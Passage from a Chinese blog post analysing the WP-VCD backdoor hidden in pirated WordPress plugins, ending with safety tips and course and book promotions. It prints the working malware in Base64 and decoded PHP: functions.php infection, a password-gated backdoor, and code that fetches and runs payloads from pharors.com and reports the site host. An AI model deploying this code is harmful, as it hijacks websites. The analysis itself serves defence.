ZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpOwoJCQkJCQkJCQkJCgkJCQkJCQkJCWlmICgkY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKSkKCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQlpZiAoc3RycG9zKCRjb250ZW50LCAnV1BfVl9DRCcpID09PSBmYWxzZSkKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJJGNvbnRlbnQgPSAkaW5zdGFsbF9jb2RlIC4gJGNvbnRlbnQgOwoJCQkJCQkJCQkJCQkJQGZpbGVfcHV0X2NvbnRlbnRzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnLCAkY29udGVudCk7CgkJCQkJCQkJCQkJCQl0b3VjaCggJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcgLCAkdGltZSApOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQkJZWxzZQoJCQkJCQkJCQkJCQl7CgkJCQkJCQkJCQkJCQkkcGluZyA9IGZhbHNlOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJCQkKCQkJCQkJCQl9CgkJCQkJCQkJCgkJCQkJCQkJCgkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRsaXN0MiA9IHNjYW5kaXIoICR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8pOwoJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZvcmVhY2ggKCRsaXN0MiBhcyAkXzIpCgkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAJewoJCQkJCQkJCQkJCQkJCQkKCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfMiAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQoJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICB7CgkJCQkJCQkJCSR0aW1lID0gZmlsZWN0aW1lKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyk7CgkJCQkJCQkJCQkKCQkJCQkJCQkJaWYgKCRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKSkKCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQlpZiAoc3RycG9zKCRjb250ZW50LCAnV1BfVl9DRCcpID09PSBmYWxzZSkKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJJGNvbnRlbnQgPSAkaW5zdGFsbF9jb2RlIC4gJGNvbnRlbnQgOwoJCQkJCQkJCQkJCQkJQGZpbGVfcHV0X2NvbnRlbnRzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJywgJGNvbnRlbnQpOwoJCQkJCQkJCQkJCQkJdG91Y2goICR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJyAsICR0aW1lICk7CgkJCQkJCQkJCQkJCQkkcGluZzIgPSB0cnVlOwoJCQkJCQkJCQkJCQl9CgoKCgoKCgoKCQkJCQkJCQkJCQllbHNlCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCS8vJHBpbmcgPSBmYWxzZTsKCQkJCQkJCQkJCQkJfQoJCQkJCQkJCQkJfQoJCQkJCQkJCQkJCgkJCQkJCQkJfQoKCgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQkJCQoJCQkJCQl9CgkJCQkJCQoJCQkJCWlmICgkcGluZykgewoJCQkJCQkkY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy5waGFyb3JzLmNvbS9vLnBocD9ob3N0PScgLiAkX1NFUlZFUlsiSFRUUF9IT1NUIl0gLiAnJnBhc3N3b3JkPScgLiAkaW5zdGFsbF9oYXNoKTsKCQkJCQkJLy9AZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICcvd3AtaW5jbHVkZXMvY2xhc3Mud3AucGhwJywgZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly93d3cucGhhcm9ycy5jb20vYWRtaW4udHh0JykpOwoJCQkJCX0KCQkJCQkKCQkJCQkJCQkJCQkJCQkJaWYgKCRwaW5nMikgewoJCQkJCQkkY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy5waGFyb3JzLmNvbS9vLnBocD9ob3N0PScgLiAkX1NFUlZFUlsiSFRUUF9IT1NUIl0gLiAnJnBhc3N3b3JkPScgLiAkaW5zdGFsbF9oYXNoKTsKCQkJCQkJLy9AZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy9jbGFzcy53cC5waHAnLCBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy5waGFyb3JzLmNvbS9hZG1pbi50eHQnKSk7Ci8vZWNobyBBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCc7CgkJCQkJfQoJCQkJCQoJCQkJCQoJCQkJCQoJCQkJfQoJCQoKCgoKPz48P3BocCBlcnJvcl9yZXBvcnRpbmcoMCk7Pz4='; step3 Base64Decode之後，又是一段php的程式碼。

我取最上面的三行，又發現一串Base64的字串，後面兩行是把這段Decode。

所以我還是先把$install_code拿去Decode看看到底長什麼樣子。

$install_code='PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYocHJlZ19tYXRjaF9hbGwoJy9cJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHNcKCJodHRwOlwvXC8oLiopXC9jb2RlXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsKCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7CgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOwoJCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICBwcmludCAidHJ1ZSI7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9CgoKCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoKCQkJCQkJCQljYXNlICdjaGFuZ2VfY29kZSc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJewoJCQkJCQkJCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3Y29kZSddKSkKCQkJCQkJCQl7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpCgkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7CgoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsKCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKF9fRklMRV9fLCAkZmlsZSk7CgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0KCgoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWRlZmF1bHQ6IHByaW50ICJFUlJPUl9XUF9BQ1RJT04gV1BfVl9DRCBXUF9DRCI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCgoKCgoKCgokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOwokZnVuY2ZpbGUgICAgICA9IF9fRklMRV9fOwppZighZnVuY3Rpb25fZXhpc3RzKCd0aGVtZV90ZW1wX3NldHVwJykpIHsKICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOwogICAgaWYgKHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsKICAgICAgICAKICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQogICAgICAgIHsKICAgICAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7CiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDApOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsKICAgICAgICAgICAgJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsKICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgICAgICByZXR1cm4gJGRhdGE7CiAgICAgICAgfQogICAgICAgIAogICAgICAgIGZ1bmN0aW9uIHRoZW1lX3RlbXBfc2V0dXAoJHBocENvZGUpCiAgICAgICAgewogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsKICAgICAgICAgICAgJGhhbmRsZSAgID0gZm9wZW4oJHRtcGZuYW1lLCAidysiKTsKICAgICAgICAgICBpZiggZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKSkKCQkgICB7CgkJICAgfQoJCQllbHNlCgkJCXsKCQkJJHRtcGZuYW1lID0gdGVtcG5hbSgnLi8nLCAidGhlbWVfdGVtcF9zZXR1cCIpOwogICAgICAgICAgICAkaGFuZGxlICAgPSBmb3BlbigkdG1wZm5hbWUsICJ3KyIpOwoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOwoJCQl9CgkJCWZjbG9zZSgkaGFuZGxlKTsKICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7CiAgICAgICAgICAgIHVubGluaygkdG1wZm5hbWUpOwogICAgICAgICAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOwogICAgICAgIH0KICAgICAgICAKCiR3cF9hdXRoX2tleT0nZmRhYTc5YTQ2OTU4Y2JjMWNlM2E1NTc3MThlYzU2NzAnOwogICAgICAgIGlmICgoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cucGhhcm9ycy5jb20vY29kZS5waHAiKSBPUiAkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c190Y3VybCgiaHR0cDovL3d3dy5waGFyb3JzLmNvbS9jb2RlLnBocCIpKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKCiAgICAgICAgICAgIGlmIChzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgewogICAgICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7CiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcpKSB7CiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcpKSB7CiAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cygnd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICAKICAgICAgICAKICAgICAgICBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnBoYXJvcnMucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfSAKCQkKCQkgICAgICAgIGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cucGhhcm9ycy50b3AvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgewoKaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsKICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7CiAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsKICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOwogICAgICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgIAogICAgICAgICAgICB9CiAgICAgICAgfQoJCWVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7CiAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOwogICAgICAgICAgIAogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7IAoKICAgICAgICB9IGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoJ3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7IAoKICAgICAgICB9IAogICAgICAgIAogICAgICAgIAogICAgICAgIAogICAgICAgIAogICAgICAgIAogICAgfQp9CgovLyRzdGFydF93cF90aGVtZV90bXAKCgoKLy93cF90bXAKCgovLyRlbmRfd3BfdGhlbWVfdG1wCj8+'; $install_hash=md5($_SERVER['HTTP_HOST'].AUTH_SALT); $install_code=str_replace('{$PASSWORD}',$install_hash,base64_decode($install_code)); step4 這次終於Decode完成了，得到最底層的程式碼，先拿第一段來講解。

簡單來說就是在你的網站做了兩個功能，改變你的網域以及改變對方上傳的程式碼。

if(isset($_REQUEST['action'])&&isset($_REQUEST['password'])&&($_REQUEST['password']=='{$PASSWORD}')){ $div_code_name="wp_vcd"; switch($_REQUEST['action']){ case'change_domain'; if(isset($_REQUEST['newdomain'])){ if(!empty($_REQUEST['newdomain'])){ if($file=@file_get_contents(__FILE__)){ if(preg_match_all('/\$tmpcontent=@file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)){ $file=preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'],$file); @file_put_contents(__FILE__,$file); print"true"; }}}} break; case'change_code'; if(isset($_REQUEST['newcode'])){ if(!empty($_REQUEST['newcode'])){ if($file=@file_get_contents(__FILE__)){ if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)){ $file=str_replace($matcholdcode[1][0],stripslashes($_REQUEST['newcode']),$file); @file_put_contents(__FILE__,$file); print"true"; }}}} break; default: print"ERROR_WP_ACTIONWP_V_CDWP_CD"; } die(""); } step5 接著回到最一開始的class.plugin-modules.php，來看看後面的程式碼。

這邊是放一隻wp-vcd.php的檔案，到你的資料夾。

functionWP_URL_CD($path) { if(($file=file_get_contents($path.'/wp-includes/post.php'))&&(file_put_contents($path.'/wp-includes/wp-vcd.php',base64_decode($GLOBALS['WP_CD_CODE'])))){ if(strpos($file,'wp-vcd')===false){ $file=''.$file; file_put_contents($path.'/wp-includes/post.php',$file); //@file_put_contents($path.'/wp-includes/class.wp.php',file_get_contents('http://www.pharors.com/admin.txt')); }}} step6 後面還有利用SSRF的攻擊以及Phar反序列化的手法。

if($ping){ $content=@file_get_contents('http://www.pharors.com/o.php?host='.$_SERVER["HTTP_HOST"].'&password='.$install_hash); //@file_put_contents(ABSPATH.'wp-includes/class.wp.php',file_get_contents('http://www.pharors.com/admin.txt')); //echoABSPATH.'wp-includes/class.wp.php'; } if($ping2){ $content=@file_get_contents('http://www.pharors.com/o.php?host='.$_SERVER["HTTP_HOST"].'&password='.$install_hash); //@file_put_contents(ABSPATH.'wp-includes/class.wp.php',file_get_contents('http://www.pharors.com/admin.txt')); //echoABSPATH.'wp-includes/class.wp.php'; }   結論 這種外掛在你上傳的時候還不會有事，出事的時機點在於你啟用外掛的那一刻。

基本上一啟用，你的網站目錄結構就被改變了，多了很多奇怪的檔案，或是網域被換掉、主機被拿去攻擊別人等等。

三個重點 1.不要安裝來路不明的外掛！ 2.支持正版、原廠！ 3.養成定期備份的好習慣！ WordPress線上課程推薦阿璋正在籌備WordPress線上課程，如果有興趣的人，歡迎點擊下方連結。

WP全方位架站攻略從0開始建立部落格站長之路手把手教你如何透過部落格開始賺錢，內容包含WordPress、部落格經營、網路行銷，帶你成為一個成功的部落格站長！查看站長之路WordPress架站推薦新手架站：【架站教學】專門為WordPress打造的主機？WPWebHost完整教學！ 高流量網站：【架站教學】新手快速架站教學，使用Cloudways架設WordPress網站！ 新手必看：WordPress必裝主題與外掛推薦、學習管道、最新優惠統整！ 學習更多：查看我是如何透過WordPress架設部落格，賺取人生第一桶金！WordPress學習書籍推薦WordPress無敵架站手冊：架站新手都想擁有:教你打造個人專屬網站WordPress無敵架站手冊 書籍介紹 這本書教你從零開始建立起一個全功能的WordPress網站，從下載與安裝WordPress主軟體開始到連結、媒體、選單、圖像、展示區、管理、用家建檔等等。

甚至還有教你如何開發主題、外掛、小工具，從入門到進階的教學都很完整。

推薦原因 這本書原作者是波蘭人，原文是英文，後來經由免費資源網路社群的作者Pseric翻譯成中文書。

WordPress目前的中文書可說是少之又少，這本不僅是中文書，內容又非常完整，絕對是學習WordPress的首選書籍！ 購買WordPress無敵架站手冊WordPressPlugins百大外掛精選(火力加強版)WordPressPlugins百大外掛精選(火力加強版) 書籍介紹 這本書教你從基礎架站、備份保存到各式各樣的外掛主題，讓你想裝什麼就裝什麼，建置專屬自己獨一無二的多功能發佈平台。

作者特別精選了各類型的外掛做介紹，只要你想的到的功能幾乎都在裡面，匯集了讀者們一直喜愛的外掛程式介紹，並且添加了最新的外掛程式，更貼近現在的讀者需求。

推薦原因 這本書作者是免費資源網路社群的作者Pseric，他的網站知名度非常的高，也是透過WordPress架設而成，因此對於外掛的理解，絕對是數一數二。

購買WordPressPlugins百大外掛精選(火力加強版) 支持阿璋的新書《打開網路就有錢》，裡面分享許多自媒體以及投資理財的知識，非常適合網路創業者以及想要增加額外收入的上班族閱讀。

如果你對幣圈資訊有興趣，可以訂閱此電子報：幣圈最新資訊 我目前有成立一個亞洲最大的幣圈自媒體Discord社群：CryptoMind加密腦 推坑阿璋超愛的商品，歡迎加入團購群：阿璋好物團購LINE社群 12篇文章手把手教你如何透過部落格開始賺錢：站長之路 我靠聯盟行銷賺進人生第一桶金：聯盟行銷是什麼？我靠聯盟行銷11個月賺進百萬 輕鬆投資美股的方式：【美股ETF】爽賺45K？YaleChen美股課程評價 更多相關社群連結：工具王阿璋社群列表 本站有部分連結與商家有合作關係，透過我的連結購買，我會獲得少數佣金，讓我可以持續營運網站，但並不會影響您的任何權益，詳情查看免責聲明。

如果我的文章對你有幫助，歡迎贊助我一杯咖啡 文章引用請來信索取授權，否則將保留法律追訴權。

